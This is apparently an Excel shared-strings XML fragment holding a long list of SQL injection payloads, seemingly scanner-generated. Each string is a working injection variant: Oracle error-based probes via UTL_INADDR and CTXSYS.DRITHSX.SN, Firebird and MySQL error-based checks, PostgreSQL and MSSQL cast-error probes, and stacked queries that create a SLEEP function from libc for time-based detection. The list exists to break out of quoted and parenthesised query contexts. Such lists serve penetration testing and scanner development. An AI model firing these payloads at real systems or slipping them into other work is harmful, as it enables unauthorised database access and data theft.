    <t xml:space="preserve">' AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">" AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND  ( 7629 = 7629</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (  4008 = 4008</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (   ( 90 = 90</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )  </t>
  </si>
  <si>
    <t>' )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND  ( 'RydG' = 'RydG</t>
  </si>
  <si>
    <t>'  )  )   AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (  'wiYN' = 'wiYN</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (   ( 'KGZB' = 'KGZB</t>
  </si>
  <si>
    <t>' AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND 'PwFS' = 'PwFS</t>
  </si>
  <si>
    <t>' )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND  ( 'yHuj' LIKE 'yHuj</t>
  </si>
  <si>
    <t>'  )  )   AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (  'KgPc' LIKE 'KgPc</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (   ( 'AeRN' LIKE 'AeRN</t>
  </si>
  <si>
    <t>' AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND 'BBmG' LIKE 'BBmG</t>
  </si>
  <si>
    <t>" )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND  ( "noxZ" = "noxZ</t>
  </si>
  <si>
    <t>"  )  )   AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (  "oGcj" = "oGcj</t>
  </si>
  <si>
    <t>"  )  )   )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (   ( "QAFl" = "QAFl</t>
  </si>
  <si>
    <t>" AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND "ICbb" = "ICbb</t>
  </si>
  <si>
    <t>" )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND  ( "LfKE" LIKE "LfKE</t>
  </si>
  <si>
    <t>"  )  )   AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (  "qjMz" LIKE "qjMz</t>
  </si>
  <si>
    <t>"  )  )   )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND   (  (   ( "QwhB" LIKE "QwhB</t>
  </si>
  <si>
    <t>" AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   AND "xigA" LIKE "xigA</t>
  </si>
  <si>
    <t xml:space="preserve"> )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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">' AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">"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</si>
  <si>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AND  ( 4806 = 4806</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (  5941 = 5941</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (   ( 6261 = 6261</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   ) </t>
  </si>
  <si>
    <t>' )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND  ( 'vKIp' = 'vKIp</t>
  </si>
  <si>
    <t>'  )  )   AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (  'cFpe' = 'cFpe</t>
  </si>
  <si>
    <t>'  )  )   )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (   ( 'rWOl' = 'rWOl</t>
  </si>
  <si>
    <t>' AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND 'iEbb' = 'iEbb</t>
  </si>
  <si>
    <t>' )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND  ( 'Xftm' LIKE 'Xftm</t>
  </si>
  <si>
    <t>'  )  )   AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (  'RImW' LIKE 'RImW</t>
  </si>
  <si>
    <t>'  )  )   )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (   ( 'MqjG' LIKE 'MqjG</t>
  </si>
  <si>
    <t>' AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND 'xHrB' LIKE 'xHrB</t>
  </si>
  <si>
    <t>" )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND  ( "ifGf" = "ifGf</t>
  </si>
  <si>
    <t>"  )  )   AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (  "FnMb" = "FnMb</t>
  </si>
  <si>
    <t>"  )  )   )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (   ( "eVIj" = "eVIj</t>
  </si>
  <si>
    <t>" AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND "sVPQ" = "sVPQ</t>
  </si>
  <si>
    <t>" )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND  ( "RKzl" LIKE "RKzl</t>
  </si>
  <si>
    <t>"  )  )   AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (  "HYlT" LIKE "HYlT</t>
  </si>
  <si>
    <t>"  )  )   )  AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND   (  (   ( "PwbW" LIKE "PwbW</t>
  </si>
  <si>
    <t>" AND 7194 = CTXSYS.DRITHSX.SN ( 7194, ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7194 = 7194 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )   )  AND "XyCC" LIKE "XyCC</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' ) </t>
  </si>
  <si>
    <t xml:space="preserve">' )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' ) </t>
  </si>
  <si>
    <t xml:space="preserve">' AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' ) </t>
  </si>
  <si>
    <t xml:space="preserve">" AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' ) </t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND  ( 7995 = 7995</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (  1018 = 1018</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (   ( 9223 = 9223</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' ) </t>
  </si>
  <si>
    <t>' )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND  ( 'zlaU' = 'zlaU</t>
  </si>
  <si>
    <t>'  )  )   AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (  'RIBh' = 'RIBh</t>
  </si>
  <si>
    <t>'  )  )   )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (   ( 'veki' = 'veki</t>
  </si>
  <si>
    <t>' AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND 'pKON' = 'pKON</t>
  </si>
  <si>
    <t>' )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND  ( 'Ukwc' LIKE 'Ukwc</t>
  </si>
  <si>
    <t>'  )  )   AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (  'YRsQ' LIKE 'YRsQ</t>
  </si>
  <si>
    <t>'  )  )   )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (   ( 'VQRp' LIKE 'VQRp</t>
  </si>
  <si>
    <t>' AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND 'iipk' LIKE 'iipk</t>
  </si>
  <si>
    <t>" )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND  ( "YxhI" = "YxhI</t>
  </si>
  <si>
    <t>"  )  )   AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (  "ALmp" = "ALmp</t>
  </si>
  <si>
    <t>"  )  )   )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (   ( "TvFM" = "TvFM</t>
  </si>
  <si>
    <t>" AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND "FfbM" = "FfbM</t>
  </si>
  <si>
    <t>" )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND  ( "fmhA" LIKE "fmhA</t>
  </si>
  <si>
    <t>"  )  )   AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (  "YUCQ" LIKE "YUCQ</t>
  </si>
  <si>
    <t>"  )  )   )  AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND   (  (   ( "iMCV" LIKE "iMCV</t>
  </si>
  <si>
    <t>" AND 2082 =  ( ':clz:'|| ( SELECT CASE 2082 WHEN 2082 THEN 1 ELSE 0 END FROM RDB$DATABASE ) ||':xid:' )  AND "CspK" LIKE "CspK</t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT 7897 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 7897 = 7897 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a ) </t>
  </si>
  <si>
    <t xml:space="preserve">, ( CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 6612 = 6612 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">, ( CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 9913 = 9913 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( REPLACE  (  (  SELECT  ( CASE WHEN  ( 7847 = 7847 )  THEN 1 ELSE 0 END )  FROM DUAL ) ,CHR ( 32 ) ,CHR ( 58 ) ||CHR ( 102 ) ||CHR ( 58  )  )   ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;--</t>
  </si>
  <si>
    <t>' ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;--</t>
  </si>
  <si>
    <t>'; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;--</t>
  </si>
  <si>
    <t>"; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND  ( 9078 = 9078</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; CREATE OR REPLACE FUNCTION SLEEP ( int )  RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep ( 5 ) ;-- AND   (  (  3862 = 3862</t>
  </si>
  <si>
